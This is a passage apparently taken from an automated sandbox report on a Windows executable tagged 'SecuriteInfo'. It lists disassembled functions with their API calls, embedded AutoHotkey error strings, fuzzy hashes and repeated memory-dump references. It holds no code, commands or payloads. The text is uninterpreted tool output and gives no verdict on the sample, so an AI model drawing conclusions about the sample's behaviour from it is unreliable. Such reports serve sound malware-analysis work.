                            • Instruction ID: e2880a8f70938640a6b8e2652e2984d0e9c2f9ce974f6fc9e338832027b52159
                            • Opcode Fuzzy Hash: bb976d4ef410dca56b34cfdf591ad2465a6126ab175f72c8351aeb2425df3519
                            • Instruction Fuzzy Hash: 76F0C03164270481FB5F9B67A4653A521D4EB9DB84F080178AF8D4B3E6EF7C84D19750
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: powf$freemalloc$CreateInstance_wcstoi64
                            • String ID: Can't Change Setting$Can't Get Current Setting$Can't Open Specified Mixer$Component Doesn't Support This Control Type$Memory limit reached (see #MaxMem in the help file).$Mixer Doesn't Have That Many of That Component Type$Mixer Doesn't Support This Component Type$Off$Out of memory.
                            • API String ID: 545791434-609076530
                            • Opcode ID: 69389a3793f774edd0ab6d34e24db7eb0e4adae349bfea579473de0e9614bf4d
                            • Instruction ID: 2e357812908c0d0d025c1239dd5bd0c6286d786cf705c47e361058ee705a81ad
                            • Opcode Fuzzy Hash: 69389a3793f774edd0ab6d34e24db7eb0e4adae349bfea579473de0e9614bf4d
                            • Instruction Fuzzy Hash: 1482BF32604E8496EB639F26D8447E823A2FB5D7D4F258A02FB4D27BB5DB34C595C340
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID:
                            • String ID: Memory limit reached (see #MaxMem in the help file).$Out of memory.
                            • API String ID: 0-457448710
                            • Opcode ID: 2fa3e6d679b0da51a55582568660f70707e723a2b74c822d84b409da99b8a8c1
                            • Instruction ID: d562a6c9ef44c4e4d2445b5d0b63b34a53220fc79aaadae7069a897203f343d0
                            • Opcode Fuzzy Hash: 2fa3e6d679b0da51a55582568660f70707e723a2b74c822d84b409da99b8a8c1
                            • Instruction Fuzzy Hash: 7F32BD73204B8081FB278B27E4443EA67A1F74DBD8F505212EB5A17BB5EB38CA95D740
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID:
                            • String ID: $$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$Error text not found (please report)$LF)$NO_START_OPT)$UCP)$UTF16)$no error
                            • API String ID: 0-3688278424
                            • Opcode ID: 77db81d414183aaf20a356922eaab2ca028f9a30755bfd6d5a037830ced2926e
                            • Instruction ID: ca81032d6f157d4f7278efd0ea6399c65db1b0fb0da84bbd9cb3b3510297b97a
                            • Opcode Fuzzy Hash: 77db81d414183aaf20a356922eaab2ca028f9a30755bfd6d5a037830ced2926e
                            • Instruction Fuzzy Hash: 51829D72614F948AE7668FA6D4403EE37F4F758798F504126FB4A8B7A4EB78C944CB00
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: Time$CurrentDirectoryFileSystem
                            • String ID: ErrorLevel$Memory limit reached (see #MaxMem in the help file).$Out of memory.
                            • API String ID: 2903961910-844184505
                            • Opcode ID: c33519dd18e401127068821e514c1796dc481b2ced9d9bc905dbf7b530576852
                            • Instruction ID: e452918c816160f1add320c16c544f1ae885b40aed19fbf002c5833744c660ac
                            • Opcode Fuzzy Hash: c33519dd18e401127068821e514c1796dc481b2ced9d9bc905dbf7b530576852
                            • Instruction Fuzzy Hash: 69E17B71200B5482FB669B27E4587E963A1E78CBD8F48411AEF4E5B7B6DF38C845C740
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: _errno_invalid_parameter_noinfo
                            • String ID: $ $.$.
                            • API String ID: 2959964966-1066414380
                            • Opcode ID: a62da00c069738e4583b5200607d2fa3bbcbab8ad500624de1b3c4d03651acd4
                            • Instruction ID: f2b7b8148c2cedaa663370146d2f5a31c80abbfc9ca1e3ed00a4447fe0fa73ee
                            • Opcode Fuzzy Hash: a62da00c069738e4583b5200607d2fa3bbcbab8ad500624de1b3c4d03651acd4
                            • Instruction Fuzzy Hash: 9702A031A0525081FABB5A0BA4513FB63D1A79FBC0F448026FF9A577F4EA7DCC828210
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 0000000140067BB0: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,0000000140048AE2), ref: 0000000140067BE3
                              • Part of subcall function 0000000140067BB0: IsWindowVisible.USER32 ref: 0000000140067C04
                            • SendMessageTimeoutW.USER32 ref: 000000014004C0CD
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: Window$ForegroundMessageSendTimeoutVisible
                            • String ID: Memory limit reached (see #MaxMem in the help file).$Out of memory.
                            • API String ID: 578228273-457448710
                            • Opcode ID: de1752a93e43fc0c095275b37ad3b552b58310ccad59a6b1c258ecfacbbbd951
                            • Instruction ID: 4a5895365a7fcea1d2005f3acff7ee59181f16bc4f6896a7f3587883f5336dd3
                            • Opcode Fuzzy Hash: de1752a93e43fc0c095275b37ad3b552b58310ccad59a6b1c258ecfacbbbd951
                            • Instruction Fuzzy Hash: 65A11272614B4082FBA79F27E400BE96361E74DBD8F558222EF4E177B9DA78C846C344
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: Window$ForegroundVisible_errno_invalid_parameter_noinfo
                            • String ID: Memory limit reached (see #MaxMem in the help file).$Out of memory.$ahk_parent
                            • API String ID: 1550069138-3360053881
                            • Opcode ID: 791bcc1ef53e0924103ae573092697adfa925147c306770d5f1c8e343d19fa63
                            • Instruction ID: ff04578fc3d4003793e6655bbdf5e4a15bc3961022ef3de59b51edcdf42d9f48
                            • Opcode Fuzzy Hash: 791bcc1ef53e0924103ae573092697adfa925147c306770d5f1c8e343d19fa63
                            • Instruction Fuzzy Hash: 0DB1A072704B4081EB139B2BE5103EAA391E78EBD4F594122FF5D177A9EA7CC882D744
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                            • String ID:
                            • API String ID: 1445889803-0
                            • Opcode ID: 54841a7e5d043fc96d74d71a08a47b5bdd7dbd32f6dc71d9de03125e16b84065
                            • Instruction ID: a09a53a0c690d69a49a56e8977f733fe46465dd1812ff0193e5e5bc73d101388
                            • Opcode Fuzzy Hash: 54841a7e5d043fc96d74d71a08a47b5bdd7dbd32f6dc71d9de03125e16b84065
                            • Instruction Fuzzy Hash: 02016D32365A0086EB828F22E8843996360F74DBE0F446621EF9E47BB0DA38CDD58740
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: FileFind$AttributesCloseFirst
                            • String ID: \\?\
                            • API String ID: 48322524-4282027825
                            • Opcode ID: cecff236244209d76ea20281425bd61ef77e67c90f733c6f3633e603fb2a00c1
                            • Instruction ID: 25bdd05c8f2998c15a5893cba9c3c2bff2c5efd81e04550325d234ba1d8e8826
                            • Opcode Fuzzy Hash: cecff236244209d76ea20281425bd61ef77e67c90f733c6f3633e603fb2a00c1
                            • Instruction Fuzzy Hash: A221D77670569181EF668F16E4443E563A1A768BE4F484320FF69076F4EB38CDC5CB40
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: BlockInput$free
                            • String ID:
                            • API String ID: 984266599-0
                            • Opcode ID: aa214f473a740cd7ac8d7dd1923d8d319f5244daf0beecebea246845b2fcc149
                            • Instruction ID: 3bcf110e78db408238b800eec9046f4e7006e19437b52402031e98c36dfb7805
                            • Opcode Fuzzy Hash: aa214f473a740cd7ac8d7dd1923d8d319f5244daf0beecebea246845b2fcc149
                            • Instruction Fuzzy Hash: FD618C321086C08AE7BB8B17A8447EA7BA1F39D794F44411AEF951B6B5D73DCA44CF10
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ab0007777e31e3ebcecc367cc973bfc2980347714b0f57bbe91462aad423ab86
                            • Instruction ID: 3eb070914184f6cb0c1a58740e392ff3c8346199cb6a3897922b4fa1ef9ab2af
                            • Opcode Fuzzy Hash: ab0007777e31e3ebcecc367cc973bfc2980347714b0f57bbe91462aad423ab86
                            • Instruction Fuzzy Hash: EB329F36B10A91CAE7618FAAD440BED37B1F358BD8F554126EF6997BA8DB34C841C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e96612901d6f8909945da2a85467c766e87d24992f0cf6bcf42f011046207e72
                            • Instruction ID: 8af5cd857e509fd901747dc4cc987ff7ffe23108488fee7149ead2641eff3e4e
                            • Opcode Fuzzy Hash: e96612901d6f8909945da2a85467c766e87d24992f0cf6bcf42f011046207e72
                            • Instruction Fuzzy Hash: 4BD1CB72221B8489EB66CF67D554BE923E1FB4DBD4F448516EB0A077E5EB3AC881C340
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: malloc
                            • String ID: +LastFoundExist$Could not create window.$Invalid Gui name.$Out of memory.$Parameter #1 invalid.
                            • API String ID: 2803490479-3585094845
                            • Opcode ID: fc11c4498e5dec7cf9fbd7dd79110698762216b4993d1498f8a92780a720ce5c
                            • Instruction ID: 932bb247b58d38c51dbc46a9fe2a5ae706123f23d4297c4c70f6333c509ecd4b
                            • Opcode Fuzzy Hash: fc11c4498e5dec7cf9fbd7dd79110698762216b4993d1498f8a92780a720ce5c
                            • Instruction Fuzzy Hash: 42E15A72225B4581EA5A9F17E491BE973B4F78DFC0F484125EB4A0B7B5EF38CA498340
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CreateObjectText$BrushCapsDeviceFaceMetricsSelectSolidStockwcsncpy
                            • String ID: DISPLAY
                            • API String ID: 1918898772-865373369
                            • Opcode ID: 2629dc038928bed66374922351a5a93c07c3580437399966da7eb1b7cf568d43
                            • Instruction ID: 907e279fcac2e39801c8a06dc077f34caba90cdc2bdc0f9c09f48020a4d53699
                            • Opcode Fuzzy Hash: 2629dc038928bed66374922351a5a93c07c3580437399966da7eb1b7cf568d43
                            • Instruction Fuzzy Hash: F781203260069086FB2A9F2294413ED33E1F798BDDF524529FB5607AF8EB38C990C744
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: MessageSend$Window$CreateLongObjectReleaseSelect
                            • String ID: Can't create control.$button
                            • API String ID: 841324528-1804316079
                            • Opcode ID: 852378cdacdfa7696e6ca8031159c097b59655e2a1df86454152de0b7217c2e8
                            • Instruction ID: bd8bf647582bbf6fca3fc36a834a0b6c9f1cedf2da7b4c0993d487093af01bad
                            • Opcode Fuzzy Hash: 852378cdacdfa7696e6ca8031159c097b59655e2a1df86454152de0b7217c2e8
                            • Instruction Fuzzy Hash: B1410876715A8086EB52CF2AE4847A973A0F78CB98F144122EF4D57B78DF39C985CB40
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: _errno$_invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                            • String ID:
                            • API String ID: 2295021086-0
                            • Opcode ID: f7e83ee9f2c68b7965d7f4bf84082b364ba246a12f2a3bba6266ccb3e6eaca42
                            • Instruction ID: 6a2dcb02feb55ec248ae1d6cc3e201fe22b255e4e8706f50cb68b956545a83a6
                            • Opcode Fuzzy Hash: f7e83ee9f2c68b7965d7f4bf84082b364ba246a12f2a3bba6266ccb3e6eaca42
                            • Instruction Fuzzy Hash: 4A5198326057808AFBB79F66D4443EC3AB4AF487D4F144511FF5507AE5DB3884478721
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
